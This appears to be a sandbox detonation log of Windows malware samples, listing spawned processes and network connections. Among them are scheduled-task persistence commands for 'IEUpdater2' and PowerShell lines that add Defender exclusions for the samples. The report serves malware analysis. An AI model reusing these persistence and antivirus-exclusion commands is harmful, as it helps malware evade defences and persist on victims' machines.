"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI9844.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240949296 722 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallAegLauncherService

C:\Program Files\MobiGame\aeg_launcher.exe

"C:\Program Files\MobiGame\aeg_launcher.exe" -service=install

C:\Windows\system32\sc.exe

"sc.exe" config AegLauncher start= demand

C:\Program Files\MobiGame\utils\subinacl.exe

"C:\Program Files\MobiGame\utils\subinacl.exe" /service AegLauncher /grant=S-1-5-21-177160434-2093019976-369403398-1000=F

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIA68D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240953000 735 VirtualBoxSetup!VirtualBoxSetup.CustomActions.UpdateUninstallData

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 76CDA50BA93AFAFD0AB6A1C65F926586 E Global\MSI0000

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIAE7F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240955015 744 VirtualBoxSetup!VirtualBoxSetup.CustomActions.RegisterCustomProtocol

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIBD17.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240959218 753 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallVirtualBox

C:\Windows\system32\cmd.exe

"cmd.exe" /c "C:\Program Files\MobiGame\player\register_services.cmd"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s /u "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s /u "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Program Files\MobiGame\player\MobiVBoxSVC.exe

"C:\Program Files\MobiGame\player\MobiVBoxSVC.exe" /RegServer

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Program Files\MobiGame\player\SUPInstall.exe

"C:\Program Files\MobiGame\player\\SUPInstall.exe"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s /u "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s /u "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Program Files\MobiGame\player\MobiVBoxSVC.exe

"C:\Program Files\MobiGame\player\MobiVBoxSVC.exe" /UnregServer

C:\Program Files\MobiGame\player\NetLwfUninstall.exe

"C:\Program Files\MobiGame\player\\NetLwfUninstall.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc

C:\Program Files\MobiGame\player\USBUninstall.exe

"C:\Program Files\MobiGame\player\\USBUninstall.exe"

C:\Program Files\MobiGame\player\SUPUninstall.exe

"C:\Program Files\MobiGame\player\\SUPUninstall.exe"

C:\Windows\system32\sc.exe

"C:\Windows\system32\sc.exe" stop "MobiGameUpdater"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /u "C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIF129.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240972031 767 VirtualBoxSetup!VirtualBoxSetup.CustomActions.RemoveRegistryForAegLauncher

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6380 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.0.801601407\1223845212" -parentBuildID 20221007134813 -prefsHandle 1820 -prefMapHandle 1896 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e76d4c6-c239-4eb8-9cbc-d20b3f4ffbaf} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1980 237a66d4d58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.1.476551040\459994830" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10697464-3f5c-4cec-a697-bffa8965b57b} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 2380 2379286f558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.2.1037524358\1899594443" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 21077 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62221e04-9319-4d50-9b5e-db1b9d322779} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 3136 237aa5a9a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.3.728584832\1924207095" -childID 2 -isForBrowser -prefsHandle 3044 -prefMapHandle 3476 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48e0ac0d-5a19-49f7-9b09-15cd90dd73c4} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1464 237a89a3358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.4.1375529606\234741371" -childID 3 -isForBrowser -prefsHandle 4060 -prefMapHandle 4056 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {461702d8-30f2-4a2e-9d42-9d7ac336fd5d} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 4072 237a9a8e558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.5.886705527\788962339" -childID 4 -isForBrowser -prefsHandle 5044 -prefMapHandle 5060 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83e40d3a-1dda-40e3-b072-02b558eb5e4d} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 4992 237a9ca8b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.6.301338361\1095826375" -childID 5 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {355980e5-10da-42fd-a00f-6598d8074f2a} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5184 237a9ca8258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.7.1178465157\55827399" -childID 6 -isForBrowser -prefsHandle 5264 -prefMapHandle 5204 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {592145ba-255e-49a6-8cb6-851692a20228} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5256 237a9ca8858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.8.1941324830\2098535618" -childID 7 -isForBrowser -prefsHandle 5756 -prefMapHandle 5740 -prefsLen 26831 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {65120a99-d330-4244-86d8-a4fd471498b7} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 5764 237adab6458 tab

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-05\" -spe -an -ai#7zMap2270:88:7zEvent24910

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-05\" -spe -an -ai#7zMap13790:88:7zEvent9965

C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe

"C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\IEUpdater2\IEUpdater2.exe" /tn "IEUpdater2 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\IEUpdater2\IEUpdater2.exe" /tn "IEUpdater2 LG" /sc ONLOGON /rl HIGHEST

C:\ProgramData\IEUpdater2\IEUpdater2.exe

"C:\ProgramData\IEUpdater2\IEUpdater2.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.10.1320576165\849241804" -childID 8 -isForBrowser -prefsHandle 6120 -prefMapHandle 2648 -prefsLen 30267 -prefMapSize 232675 -jsInitHandle 1460 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f235e35-6040-4dc5-9308-9fef869bf303} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 2664 23792869f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4920.9.1021294866\72598285" -parentBuildID 20221007134813 -prefsHandle 7092 -prefMapHandle 2716 -prefsLen 30267 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa5f90e6-3e01-43da-9322-b9d55e7e92aa} 4920 "\\.\pipe\gecko-crash-server-pipe.4920" 1472 23792869358 gpu

C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe

"C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe"

C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe

"C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-04\" -spe -an -ai#7zMap18949:88:7zEvent25410

C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe

"C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe"

C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe

"C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe"

C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe

"C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe"

C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe

"C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3724 -ip 3724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\RrzzrIaRwnI.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RrzzrIaRwnI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9CBB.tmp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6608 -ip 6608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1424

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
CN 223.5.5.5:53 up.chromebd.com udp
US 8.8.8.8:53 5.5.5.223.in-addr.arpa udp
CN 116.62.132.139:88 up.chromebd.com tcp
US 8.8.8.8:53 139.132.62.116.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 d2vtta4ibs40qt.cloudfront.net udp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 164.15.239.18.in-addr.arpa udp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 18.239.15.164:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 2r5kg4.com udp
US 18.239.18.88:80 2r5kg4.com tcp
US 8.8.8.8:53 88.18.239.18.in-addr.arpa udp
US 8.8.8.8:53 d3cv8ymwoql87l.cloudfront.net udp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 198.137.222.52.in-addr.arpa udp
US 8.8.8.8:53 107.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
DE 136.243.18.118:80 www.ammyy.com tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 169.25.221.88.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 apis.google.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.251.39.104:443 ssl.google-analytics.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
NL 142.251.39.104:443 ssl.google-analytics.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
DE 172.217.23.206:443 apis.google.com udp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 104.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
DE 172.217.23.195:443 ssl.gstatic.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 gc7pu2.com udp
US 18.154.63.14:80 gc7pu2.com tcp
NL 52.222.137.198:80 d3cv8ymwoql87l.cloudfront.net tcp
US 8.8.8.8:53 14.63.154.18.in-addr.arpa udp
US 8.8.8.8:53 98.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 d2vtta4ibs40qt.cloudfront.net udp
GB 108.138.212.54:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 54.212.138.108.in-addr.arpa udp
US 8.8.8.8:53 mbdl219.com udp
NL 65.9.86.119:443 mbdl219.com tcp
US 8.8.8.8:53 119.86.9.65.in-addr.arpa udp
US 8.8.8.8:53 14.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 80.41.65.18.in-addr.arpa udp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:53 ayem2390.com udp
US 18.239.36.78:443 ayem2390.com tcp
GB 108.138.212.54:80 d2vtta4ibs40qt.cloudfront.net tcp
US 8.8.8.8:53 78.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
